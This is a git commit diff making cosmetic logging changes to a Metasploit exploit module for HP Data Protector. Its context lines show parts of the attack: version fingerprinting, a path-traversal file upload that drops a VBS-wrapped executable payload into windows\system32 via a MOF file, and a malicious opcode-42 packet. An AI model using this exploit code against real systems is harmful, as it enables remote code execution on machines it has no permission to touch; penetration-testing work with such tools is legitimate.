Add minor clean up

bug/bundler_fix
jvazquez-r7 2014-01-16 17:55:45 -06:00
parent f3c912bd32
commit eaf1b0caf6
1 changed files with 3 additions and 2 deletions

View File

@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
return Exploit::CheckCode::Unknown return Exploit::CheckCode::Unknown
end end
print_status("HP Data Protector version #{fingerprint}") print_status("#{peer} - HP Data Protector version #{fingerprint}")
if fingerprint =~ /HP Data Protector A\.06\.(\d+)/ if fingerprint =~ /HP Data Protector A\.06\.(\d+)/
minor = $1.to_i minor = $1.to_i
@ -92,6 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
mof_name = rand_text_alpha(rand(10)+5) + '.mof' mof_name = rand_text_alpha(rand(10)+5) + '.mof'
mof = generate_mof(mof_name, vbs_name) mof = generate_mof(mof_name, vbs_name)
# We can't upload binary contents, so embedding the exe into a VBS.
print_status("#{peer} - Sending HTTP ConvertFile Request to upload the exe payload #{vbs_name}") print_status("#{peer} - Sending HTTP ConvertFile Request to upload the exe payload #{vbs_name}")
res = upload_file("windows\\system32\\#{vbs_name}", vbs) res = upload_file("windows\\system32\\#{vbs_name}", vbs)
@ -158,7 +159,7 @@ class Metasploit3 < Msf::Exploit::Remote
"\\..\\..\\..\\..\\..\\#{file_name}", # rissServerCertificate "\\..\\..\\..\\..\\..\\#{file_name}", # rissServerCertificate
contents # Certificate contents contents # Certificate contents
]) ])
print_status("Sending malicious packet with opcode 42...") vprint_status("#{peer} - Sending malicious packet with opcode 42...")
sock.put(pkt) sock.put(pkt)
res = sock.get_once res = sock.get_once
disconnect disconnect